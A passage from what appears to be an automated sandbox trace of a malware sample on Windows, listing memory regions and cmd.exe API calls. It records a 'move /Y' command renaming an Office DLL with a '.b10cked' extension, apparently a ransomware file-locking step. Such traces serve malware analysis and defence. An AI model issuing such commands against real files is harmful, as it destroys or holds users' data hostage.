0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21557 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21558 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21559 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21560 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21571 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21572 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21573 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21574 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 21575 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 21576 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21577 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21578 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21579 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21580 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21581 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21582 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21583 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21584 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21585 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21586 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21587 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21588 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 21589 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21590 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 21591 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 21592 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 21593 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 21594 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 323 os_tid = 0x514 [0156.558] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fc04 | out: lpSystemTimeAsFileTime=0x28fc04*(dwLowDateTime=0x97409dc0, dwHighDateTime=0x1d440a9)) [0156.558] GetCurrentProcessId () returned 0xd48 [0156.558] GetCurrentThreadId () returned 0x514 [0156.558] GetTickCount () returned 0x3007c [0156.558] QueryPerformanceCounter (in: lpPerformanceCount=0x28fbfc | out: lpPerformanceCount=0x28fbfc*=21334741126) returned 1 [0156.559] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0156.559] __set_app_type (_Type=0x1) [0156.559] __p__fmode () returned 0x76b331f4 [0156.559] __p__commode () returned 0x76b331fc [0156.559] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0156.559] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0156.559] GetCurrentThreadId () returned 0x514 [0156.559] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x514) returned 0x38 [0156.559] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0156.559] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0156.559] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.559] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0156.559] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fb94 | out: phkResult=0x28fb94*=0x0) returned 0x2 [0156.560] VirtualQuery (in: lpAddress=0x28fbcb, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.560] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0156.560] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0156.560] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.560] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fb64, dwLength=0x1c | out: lpBuffer=0x28fb64*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0156.560] GetConsoleOutputCP () returned 0x1b5 [0156.560] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.560] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0156.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.560] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0156.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.560] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0156.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.560] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.560] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.560] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0156.561] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.561] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0156.561] GetEnvironmentStringsW () returned 0x300210* [0156.561] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0156.561] GetEnvironmentStringsW () returned 0x300210* [0156.561] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0156.561] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eb04 | out: phkResult=0x28eb04*=0x40) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0xa0, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x1, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x1, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x0, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x40, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x40, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x40, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.561] RegCloseKey (hKey=0x40) returned 0x0 [0156.561] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eb04 | out: phkResult=0x28eb04*=0x40) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x40, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x1, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x1, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x0, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x9, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x9, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x9, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.562] RegCloseKey (hKey=0x40) returned 0x0 [0156.562] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637f [0156.562] srand (_Seed=0x5b88637f) [0156.562] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"" [0156.562] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"" [0156.562] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.562] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0156.562] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0156.562] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.562] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.562] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0156.562] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0156.562] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0156.562] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0156.563] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0156.563] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0156.563] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0156.563] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0156.563] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0156.563] GetEnvironmentStringsW () returned 0x302360* [0156.563] FreeEnvironmentStringsW (penv=0x302360) returned 1 [0156.563] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.563] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.563] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0156.563] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0156.563] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0156.563] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0156.563] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0156.563] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0156.563] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0156.563] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0156.563] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f8d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f8d0, lpFilePart=0x28f8cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f8cc*="Desktop") returned 0x18 [0156.563] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0156.563] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f64c | out: lpFindFileData=0x28f64c) returned 0x3009f0 [0156.563] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0156.564] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f64c | out: lpFindFileData=0x28f64c) returned 0x3009f0 [0156.564] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0156.564] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f64c | out: lpFindFileData=0x28f64c) returned 0x3009f0 [0156.564] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0156.564] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0156.564] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0156.564] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0156.564] GetEnvironmentStringsW () returned 0x300210* [0156.564] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0156.564] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.565] GetConsoleOutputCP () returned 0x1b5 [0156.565] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.565] GetUserDefaultLCID () returned 0x409 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fa10, cchData=128 | out: lpLCData="0") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fa10, cchData=128 | out: lpLCData="0") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fa10, cchData=128 | out: lpLCData="1") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0156.565] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0156.566] GetConsoleTitleW (in: lpConsoleTitle=0x2f0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0156.566] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0156.566] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0156.566] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0156.567] _wcsicmp (_String1="move", _String2=")") returned 68 [0156.567] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0156.567] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0156.567] _wcsicmp (_String1="IF", _String2="move") returned -4 [0156.567] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0156.567] _wcsicmp (_String1="REM", _String2="move") returned 5 [0156.567] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0156.570] GetConsoleTitleW (in: lpConsoleTitle=0x28f708, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.571] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0156.571] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0156.571] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0156.571] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0156.571] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="CD") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0156.571] _wcsicmp (_String1="move", _String2="REN") returned -5 [0156.571] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0156.571] _wcsicmp (_String1="move", _String2="SET") returned -6 [0156.571] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0156.571] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0156.571] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0156.571] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0156.571] _wcsicmp (_String1="move", _String2="MD") returned 11 [0156.571] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0156.571] _wcsicmp (_String1="move", _String2="RD") returned -5 [0156.571] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0156.571] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0156.571] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0156.571] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0156.571] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0156.571] _wcsicmp (_String1="move", _String2="VER") returned -9 [0156.571] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0156.571] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0156.571] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0156.571] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0156.571] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0156.571] _wcsicmp (_String1="move", _String2="START") returned -6 [0156.571] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0156.571] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0156.571] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0156.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.573] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f4c4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f4bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f4bc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0156.574] _wcsnicmp 